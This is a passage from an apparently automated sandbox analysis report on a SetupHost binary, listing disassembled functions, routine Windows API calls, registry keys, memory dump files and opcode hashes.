                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 700423131-0
                                                                                                                        • Opcode ID: e19cc93f20c5aefeb9d48b1c43b0636cd8c0beeaa9bef30140f5994132351a1d
                                                                                                                        • Instruction ID: e05f89db13b565228c5395ce26320881ff51def8318cf9a274e91b88235d0b0d
                                                                                                                        • Opcode Fuzzy Hash: e19cc93f20c5aefeb9d48b1c43b0636cd8c0beeaa9bef30140f5994132351a1d
                                                                                                                        • Instruction Fuzzy Hash: F021C571A0031DEBCB119FA0C988BBFB77DEF49315F10406AAA0192252DB788E05DBD5
                                                                                                                        Function 0053E8E5 Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053E8EC
                                                                                                                          • Part of subcall function 004F9180: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?), ref: 004F91BD
                                                                                                                          • Part of subcall function 004F9180: GetLastError.KERNEL32(?,?,00000104,?,?), ref: 004F91C9
                                                                                                                        • GetFileVersionInfoSizeExW.KERNELBASE(00000000,00000000,?,00000014,0053E880,?,?), ref: 0053E914
                                                                                                                        • GetLastError.KERNEL32 ref: 0053E921
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0053E935
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0053E93C
                                                                                                                        • GetFileVersionInfoExW.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0053E955
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileHeapInfoLastVersion$AllocEnvironmentExpandH_prolog3ProcessSizeStrings
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2253041425-0
                                                                                                                        • Opcode ID: d74c7f46aca8459f0ff22113a9b722ef765024508526d33b9e5cb373ed6c8dd8
                                                                                                                        • Instruction ID: 4556eeace2f137da43c2887965e6d74a7b2de0b08ea694d09268a3a2e0cdaf25
                                                                                                                        • Opcode Fuzzy Hash: d74c7f46aca8459f0ff22113a9b722ef765024508526d33b9e5cb373ed6c8dd8
                                                                                                                        • Instruction Fuzzy Hash: EE117232A0430E9BDF51AFE1C85A7BE7BB5BF44356F100419E501AB2D0DB748E04DBA1
                                                                                                                        Function 00545274 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,03317CEC,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?), ref: 00545294
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 0054529B
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,03317CEC,?,03317CEC,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?), ref: 005452BD
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 005452C4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004), ref: 005452CC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 005452D3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocAllocateFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927113959-0
                                                                                                                        • Opcode ID: 9cfd4893c0c781f6ac0e4add305b65876992c73fd7f0f6120cbcff3bbdf1b5f1
                                                                                                                        • Instruction ID: 22b84f5aed1b6664225e164338d8f329d13ceb5ebabe87def2a27248e72aa0ed
                                                                                                                        • Opcode Fuzzy Hash: 9cfd4893c0c781f6ac0e4add305b65876992c73fd7f0f6120cbcff3bbdf1b5f1
                                                                                                                        • Instruction Fuzzy Hash: 99116575508B06AFD7205F95DC58A57BFECFB6835AB10883EE58683611E7B0D840DB10
                                                                                                                        Function 004F8910 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F8917
                                                                                                                        • FreeLibrary.KERNEL32(00000000,0000000C,004ECD31,00000000), ref: 004F8A09
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeH_prolog3Library
                                                                                                                        • String ID: CreateSetupObject
                                                                                                                        • API String ID: 1631603194-1491363812
                                                                                                                        • Opcode ID: 2312f2e553d6722c30291ed119f4adda2cddebd90db0761e6bf9e86cd00955ce
                                                                                                                        • Instruction ID: 7f702f54ecf7d3f58f5545d155090b0954a8e946912992af5f54c50415bb0bb9
                                                                                                                        • Opcode Fuzzy Hash: 2312f2e553d6722c30291ed119f4adda2cddebd90db0761e6bf9e86cd00955ce
                                                                                                                        • Instruction Fuzzy Hash: F6315D70A0030E8BCF15DFA9C854ABEB6B5AF98315F10042EEA05AB351CFB89D05DB55
                                                                                                                        Function 004FB0B6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(?,CorrelationVector,00000000,0N,00000000,?,00000001,?,00000000,00000000,004E3009,?,?), ref: 004FB0FE
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 004FB13B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorLastQueryValueWow64
                                                                                                                        • String ID: 0N$CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 1531546272-2068452926
                                                                                                                        • Opcode ID: a09f81744bba12c75538e417d8cafcabafd303fd8a488e6ba0f86007f010230b
                                                                                                                        • Instruction ID: 298e9142e8617ca3a54c065688c525c03c69963854c984288366eacb87a20f8b
                                                                                                                        • Opcode Fuzzy Hash: a09f81744bba12c75538e417d8cafcabafd303fd8a488e6ba0f86007f010230b
                                                                                                                        • Instruction Fuzzy Hash: 9811E57560020CEFDF019FA8CA94BBEB7BAEBC5344F20406FEA0193390DB389E059654
                                                                                                                        Function 0054A619 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 0054A66A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,00000001), ref: 0054A67C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0054A6A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastMutexObjectSingleWait_vsnwprintf
                                                                                                                        • String ID: %s+%s+%s$Global\OneSettingQueryMutex
                                                                                                                        • API String ID: 551164369-777283268
                                                                                                                        • Opcode ID: c15857fbbbed65ad222bb64fdbc886e295d5064974cceec22c6bede4e3eede2f
                                                                                                                        • Instruction ID: 21a287f5f929095d9dd5f3360b66f91b0cc0f88a862822f25cff7ddd5effc81b
                                                                                                                        • Opcode Fuzzy Hash: c15857fbbbed65ad222bb64fdbc886e295d5064974cceec22c6bede4e3eede2f
                                                                                                                        • Instruction Fuzzy Hash: 311144B4F80319A7D750DB748C0DBEA3BACBF05308F394566F501DA2D0EA74D9048BA6
                                                                                                                        Function 004F8CD1 Relevance: 7.7, APIs: 5, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wcschr.MSVCRT ref: 004F8DAD
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 004F8E48
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 004F8E60
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 004F8E71
                                                                                                                        • GetLastError.KERNEL32 ref: 004F8EAF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$CreateDirectoryErrorLastwcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2805896270-0
                                                                                                                        • Opcode ID: f39d695da9baa52d620391617d15fc9fc4f6fcc4a99c1b91071195b175e4285e
                                                                                                                        • Instruction ID: 8d2eccc039c4c4577d4847a4de6615f08fe433a2da0409f478e2f64fb61063b1
                                                                                                                        • Opcode Fuzzy Hash: f39d695da9baa52d620391617d15fc9fc4f6fcc4a99c1b91071195b175e4285e
                                                                                                                        • Instruction Fuzzy Hash: DC51E831A0162D47CF209B759C847BF7265AF94720F1106AFE605EF291EF789E858B8C
                                                                                                                        Function 004FC7BE Relevance: 7.6, APIs: 5, Instructions: 133memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,00000000,?), ref: 004FC8A8
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004FC8AF
                                                                                                                        • memcpy.MSVCRT(00000000,?,?), ref: 004FC8D1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 004FC90E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FC915
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocateFreememcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 461410222-0
                                                                                                                        • Opcode ID: 6ef9852900dcbbf2d5873574e45173237cad63066ad800434547d39bb8bc6f7c
                                                                                                                        • Instruction ID: 27f61dc2fec1335f52ed6d3cec9e811fb283506910220f314c0c2a02eef90df9
                                                                                                                        • Opcode Fuzzy Hash: 6ef9852900dcbbf2d5873574e45173237cad63066ad800434547d39bb8bc6f7c
                                                                                                                        • Instruction Fuzzy Hash: 69418675B0020EEBCB04EFA5C6D097EBBA5AF88355F10812EE606D7341DB789D05CB88
                                                                                                                        Function 005461C0 Relevance: 7.6, APIs: 5, Instructions: 97memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005461F9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00546200
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0054620F
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00546216
                                                                                                                        • GetFileSizeEx.KERNEL32(?,?), ref: 0054628D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFileFreeSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2012773705-0
                                                                                                                        • Opcode ID: 76441075a9192ba786914e5ea022fedb429189ad633f4df9a62d788189687b37
                                                                                                                        • Instruction ID: 0575cb3f22049811727fa61c3ee4e241f51fc36250bc150b650fe3d0a4902e5c
                                                                                                                        • Opcode Fuzzy Hash: 76441075a9192ba786914e5ea022fedb429189ad633f4df9a62d788189687b37
                                                                                                                        • Instruction Fuzzy Hash: 5031F639604206EFCB14EF64DC44AEABFB9FF897497088165E905CB114EB70ED05CBA1
                                                                                                                        Function 005488C5 Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WinHttpCloseHandle.WINHTTP(?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488D5
                                                                                                                        • WinHttpCloseHandle.WINHTTP(?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488E6
                                                                                                                        • WinHttpCloseHandle.WINHTTP(00000000,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488F5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 00548906
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,004EB0E2), ref: 0054890D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHttp$Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 715821489-0
                                                                                                                        • Opcode ID: d3a49feb7fb386ea9633e33ea865aec1e33596215aa743db88302a5a6f0ba883
                                                                                                                        • Instruction ID: e95db805ddbbc32e3cca72e9b4cea6e5be3973df9c0a5533ce6a4ccc246324f6
                                                                                                                        • Opcode Fuzzy Hash: d3a49feb7fb386ea9633e33ea865aec1e33596215aa743db88302a5a6f0ba883
                                                                                                                        • Instruction Fuzzy Hash: 48012435401B01DFC3329F24E9188FABFF5FFA87027204A2DE4AA42564CB326895EF40
                                                                                                                        Function 004FB4DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD21F: GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD25E
                                                                                                                          • Part of subcall function 004FD21F: IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD265
                                                                                                                          • Part of subcall function 004FD21F: GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD26F
                                                                                                                          • Part of subcall function 004FD21F: RegCloseKey.ADVAPI32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2E1
                                                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB537
                                                                                                                        • LocalFree.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB567
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB576
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 3952319208-1711884389
                                                                                                                        • Opcode ID: d5b8aa0aef917b1defda855a28c514563981e4e90e1f13960f76b2e512022f3f
                                                                                                                        • Instruction ID: eda6caa23d743c8112fe10f2a0e56b9bbcd27f689427bb7a392167cb58237080
                                                                                                                        • Opcode Fuzzy Hash: d5b8aa0aef917b1defda855a28c514563981e4e90e1f13960f76b2e512022f3f
                                                                                                                        • Instruction Fuzzy Hash: F111B97190010CFBDF119B99D809BBEB7B6EB8130DF24506AA605632A0D77C9E05DB59
                                                                                                                        Function 004FC640 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(?,InstallTicks,00000000,00000006,00000000,?,00000001,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FC688
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 004FC6C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorLastQueryValueWow64
                                                                                                                        • String ID: InstallTicks$SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 1531546272-749814351
                                                                                                                        • Opcode ID: 08e6e9063709908837261656042ab0af012c9c6b5ae109958efd343c2a675e41
                                                                                                                        • Instruction ID: 9459e68f8163def8688ac1308e15fb606411cb0bf90fb6aef48e3201c877435b
                                                                                                                        • Opcode Fuzzy Hash: 08e6e9063709908837261656042ab0af012c9c6b5ae109958efd343c2a675e41
                                                                                                                        • Instruction Fuzzy Hash: 2A11C875A0420CABDF05EFA58AD5EBEB7B9EBC4304F20406FEA05D3351DA389E059625
                                                                                                                        Function 0053ED7D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00501150: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 0050118B
                                                                                                                          • Part of subcall function 00501150: CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 005011A0
                                                                                                                          • Part of subcall function 00501150: FreeSid.ADVAPI32(?), ref: 005011BA
                                                                                                                          • Part of subcall function 00501150: SetLastError.KERNEL32(00000000), ref: 005011CB
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00552698,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0054031F,WdsSetupLogInit,?,0054031F,00552698), ref: 0053EDBF
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,0054031F,?,?,0054031F,00552698), ref: 0053EDD4
                                                                                                                        • FreeSid.ADVAPI32(0054031F,?,0054031F,00552698), ref: 0053EDE4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken$ErrorLast
                                                                                                                        • String ID: WdsSetupLogInit
                                                                                                                        • API String ID: 217881015-3317556560
                                                                                                                        • Opcode ID: 2125b1f8dc0190f551761461ca41e0ddb4c8758f3cbbc29594d6976ae439211f
                                                                                                                        • Instruction ID: fd6bcab1e3e03b54ad0ce473efe62dff239e85db90adb5758d62c9653af560fe
